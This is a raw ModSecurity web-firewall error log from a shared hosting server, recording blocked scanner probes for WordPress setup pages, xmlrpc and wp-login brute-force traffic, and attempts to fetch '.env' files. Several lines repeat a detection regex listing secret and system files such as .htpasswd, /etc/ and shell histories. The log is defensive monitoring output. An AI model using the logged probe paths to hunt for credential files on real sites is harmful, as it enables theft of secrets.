[Tue May 26 12:54:12.474119 2026] [security2:error] [pid 461618:tid 461779] [client 157.20.138.61:59585] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKnFyiSlSCHr1fdr2x7wAAAKQ"]
[Tue May 26 12:54:13.580778 2026] [security2:error] [pid 461618:tid 461830] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKnVyiSlSCHr1fdr2yBwAAANc"]
[Tue May 26 12:54:14.019602 2026] [security2:error] [pid 461618:tid 461773] [client 74.249.173.207:4438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/abc.php"] [unique_id "ahVKnlyiSlSCHr1fdr2yHAAAAJ4"]
[Tue May 26 12:54:15.352399 2026] [core:crit] [pid 461618:tid 461796] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:15.704766 2026] [security2:error] [pid 461618:tid 461812] [client 147.53.115.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKn1yiSlSCHr1fdr2yRwAAAMU"], referer: https://www.anujtradingco.com/
[Tue May 26 12:54:15.843604 2026] [security2:error] [pid 461618:tid 461653] [remote 74.7.241.58:54360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVKn1yiSlSCHr1fdr2ySwAApyI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/panel/welcome-modals
[Tue May 26 12:54:16.598279 2026] [security2:error] [pid 461618:tid 461816] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKoFyiSlSCHr1fdr2yWAAAAMk"]
[Tue May 26 12:54:16.969096 2026] [security2:error] [pid 461618:tid 461807] [client 147.53.115.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKoFyiSlSCHr1fdr2ybwAAAMA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230238&moderation-hash=3a3980b7652b86885efc1959deb47371
[Tue May 26 12:54:17.145307 2026] [security2:error] [pid 461618:tid 461800] [client 74.249.173.207:2565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wk/index.php"] [unique_id "ahVKoVyiSlSCHr1fdr2ydwAAALk"]
[Tue May 26 12:54:17.260905 2026] [security2:error] [pid 461618:tid 461853] [client 85.121.55.185:60378] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yeAAAAO4"]
[Tue May 26 12:54:17.382207 2026] [security2:error] [pid 461618:tid 461769] [client 54.205.63.235:49661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yfgAAAJo"]
[Tue May 26 12:54:17.488318 2026] [security2:error] [pid 461618:tid 461813] [client 54.205.63.235:52017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahVKoVyiSlSCHr1fdr2ygQAAAMY"]
[Tue May 26 12:54:17.488568 2026] [security2:error] [pid 461618:tid 461859] [client 54.205.63.235:52018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahVKoVyiSlSCHr1fdr2ygwAAAPQ"]
[Tue May 26 12:54:17.489560 2026] [security2:error] [pid 461618:tid 461775] [client 54.205.63.235:52022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yiAAAAKA"]
[Tue May 26 12:54:17.489591 2026] [security2:error] [pid 461618:tid 461763] [client 54.205.63.235:52016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yhwAAAJQ"]
[Tue May 26 12:54:17.489607 2026] [security2:error] [pid 461618:tid 461814] [client 54.205.63.235:52023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yiQAAAMc"]
[Tue May 26 12:54:17.489765 2026] [security2:error] [pid 461618:tid 461791] [client 54.205.63.235:52025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yhAAAALA"]
[Tue May 26 12:54:17.489767 2026] [security2:error] [pid 461618:tid 461778] [client 54.205.63.235:52020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yhQAAAKM"]
[Tue May 26 12:54:17.489867 2026] [security2:error] [pid 461618:tid 461839] [client 54.205.63.235:52028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yhgAAAOA"]
[Tue May 26 12:54:17.489917 2026] [security2:error] [pid 461618:tid 461850] [client 54.205.63.235:52026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yigAAAOs"]
[Tue May 26 12:54:17.490289 2026] [security2:error] [pid 461618:tid 461775] [client 54.205.63.235:52027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yiwAAAKA"]
[Tue May 26 12:54:17.490873 2026] [security2:error] [pid 461618:tid 461858] [client 54.205.63.235:52019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yjAAAAPM"]
[Tue May 26 12:54:17.491115 2026] [security2:error] [pid 461618:tid 461844] [client 54.205.63.235:52021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yjQAAAOU"]
[Tue May 26 12:54:17.491389 2026] [security2:error] [pid 461618:tid 461770] [client 54.205.63.235:52029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yjgAAAJs"]
[Tue May 26 12:54:17.491901 2026] [security2:error] [pid 461618:tid 461855] [client 54.205.63.235:52024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2yjwAAAPA"]
[Tue May 26 12:54:17.605383 2026] [security2:error] [pid 461618:tid 461820] [client 54.205.63.235:52116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahVKoVyiSlSCHr1fdr2ykQAAAM0"]
[Tue May 26 12:54:17.928150 2026] [security2:error] [pid 461618:tid 461868] [client 195.178.110.34:38182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVKoVyiSlSCHr1fdr2ymAAAAP0"]
[Tue May 26 12:54:18.074489 2026] [security2:error] [pid 461618:tid 461750] [client 195.178.110.34:38182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahVKolyiSlSCHr1fdr2ynwAAAIc"]
[Tue May 26 12:54:19.305127 2026] [security2:error] [pid 461618:tid 461867] [client 74.249.173.207:4467] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahVKo1yiSlSCHr1fdr2yugAAAPw"]
[Tue May 26 12:54:19.549848 2026] [security2:error] [pid 461618:tid 461787] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKo1yiSlSCHr1fdr2yswAAAKw"]
[Tue May 26 12:54:20.767176 2026] [security2:error] [pid 461618:tid 461788] [client 147.53.115.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKpFyiSlSCHr1fdr2y3gAAAK0"], referer: https://anujtradingco.com
[Tue May 26 12:54:21.262816 2026] [security2:error] [pid 461618:tid 461865] [client 74.249.173.207:4474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/as.php"] [unique_id "ahVKpVyiSlSCHr1fdr2y7wAAAPo"]
[Tue May 26 12:54:21.380484 2026] [security2:error] [pid 461618:tid 461785] [client 195.178.110.34:38194] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/dev/.env"] [unique_id "ahVKpVyiSlSCHr1fdr2y8wAAAKo"]
[Tue May 26 12:54:21.382537 2026] [security2:error] [pid 461618:tid 461748] [client 60.243.216.90:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKpFyiSlSCHr1fdr2y4gAAAIU"]
[Tue May 26 12:54:21.531890 2026] [security2:error] [pid 461618:tid 461835] [client 195.178.110.34:38194] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/new/.env"] [unique_id "ahVKpVyiSlSCHr1fdr2y9wAAANw"]
[Tue May 26 12:54:21.740338 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKpVyiSlSCHr1fdr2y8gAAAI4"]
[Tue May 26 12:54:22.129440 2026] [security2:error] [pid 461618:tid 461681] [remote 111.229.10.83:43768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVKpVyiSlSCHr1fdr2zBwAAlz4"]
[Tue May 26 12:54:22.860859 2026] [security2:error] [pid 461618:tid 461794] [client 157.20.138.61:59945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKplyiSlSCHr1fdr2zIAAAALM"]
[Tue May 26 12:54:22.861022 2026] [security2:error] [pid 461618:tid 461794] [client 157.20.138.61:59945] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKplyiSlSCHr1fdr2zIAAAALM"]
[Tue May 26 12:54:22.864936 2026] [security2:error] [pid 461618:tid 461764] [client 85.121.55.185:40504] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKplyiSlSCHr1fdr2zHAAAAJU"]
[Tue May 26 12:54:22.935115 2026] [security2:error] [pid 461618:tid 461775] [client 74.249.173.207:4464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-trackback.php"] [unique_id "ahVKplyiSlSCHr1fdr2zJAAAAKA"]
[Tue May 26 12:54:25.300964 2026] [security2:error] [pid 461618:tid 461843] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKqFyiSlSCHr1fdr2zTQAAAOQ"]
[Tue May 26 12:54:25.893071 2026] [security2:error] [pid 461618:tid 461693] [remote 123.30.233.13:36916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVKqVyiSlSCHr1fdr2zZAAA70o"]
[Tue May 26 12:54:27.354275 2026] [security2:error] [pid 461618:tid 461853] [client 85.121.55.185:40504] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKq1yiSlSCHr1fdr2zjwAAAO4"]
[Tue May 26 12:54:27.942669 2026] [security2:error] [pid 461618:tid 461789] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKq1yiSlSCHr1fdr2zlQAAAK4"]
[Tue May 26 12:54:28.108088 2026] [security2:error] [pid 461618:tid 461822] [client 85.121.55.185:40504] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKrFyiSlSCHr1fdr2zqgAAAM8"]
[Tue May 26 12:54:28.734616 2026] [security2:error] [pid 461618:tid 461770] [client 85.121.55.185:40504] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKrFyiSlSCHr1fdr2ztwAAAJs"]
[Tue May 26 12:54:29.040139 2026] [security2:error] [pid 461618:tid 461868] [client 74.249.173.207:2566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.visnagar.ucdc.co.in"] [uri "/inputs.php"] [unique_id "ahVKrVyiSlSCHr1fdr2zxAAAAP0"]
[Tue May 26 12:54:30.252381 2026] [security2:error] [pid 461618:tid 461764] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKrVyiSlSCHr1fdr2z2QAAAJU"]
[Tue May 26 12:54:30.360600 2026] [security2:error] [pid 461618:tid 461794] [client 100.26.33.102:57623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 102.33.26.100.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jkjuice.com"] [uri "/wp-login.php"] [unique_id "ahVKrVyiSlSCHr1fdr2z2gAAALM"]
[Tue May 26 12:54:30.360785 2026] [security2:error] [pid 461618:tid 461794] [client 100.26.33.102:57623] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jkjuice.com"] [uri "/wp-login.php"] [unique_id "ahVKrVyiSlSCHr1fdr2z2gAAALM"]
[Tue May 26 12:54:30.718725 2026] [security2:error] [pid 461618:tid 461703] [remote 167.172.25.98:54512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVKrlyiSlSCHr1fdr2z7gAAqFQ"]
[Tue May 26 12:54:31.507570 2026] [security2:error] [pid 461618:tid 461769] [client 20.104.227.76:17318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "onlineitmaster.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVKr1yiSlSCHr1fdr20DgAAAJo"]
[Tue May 26 12:54:32.605613 2026] [security2:error] [pid 461618:tid 461796] [client 74.249.173.207:4421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVKsFyiSlSCHr1fdr20LAAAALU"]
[Tue May 26 12:54:32.678354 2026] [security2:error] [pid 461618:tid 461691] [remote 112.196.0.228:57428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVKsFyiSlSCHr1fdr20KwAA40g"]
[Tue May 26 12:54:33.409777 2026] [security2:error] [pid 461618:tid 461756] [client 157.20.138.61:60299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKsVyiSlSCHr1fdr20QgAAAI0"]
[Tue May 26 12:54:33.409901 2026] [security2:error] [pid 461618:tid 461756] [client 157.20.138.61:60299] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKsVyiSlSCHr1fdr20QgAAAI0"]
[Tue May 26 12:54:33.556829 2026] [security2:error] [pid 461618:tid 461863] [client 85.121.55.185:40504] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKsVyiSlSCHr1fdr20QwAAAPg"]
[Tue May 26 12:54:33.710739 2026] [security2:error] [pid 461618:tid 461848] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKsVyiSlSCHr1fdr20PQAAAOk"]
[Tue May 26 12:54:34.552459 2026] [security2:error] [pid 461618:tid 461788] [client 66.249.64.41:62449] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKsVyiSlSCHr1fdr20RwAAAK0"], referer: https://mosykay.com/prizes/251237107
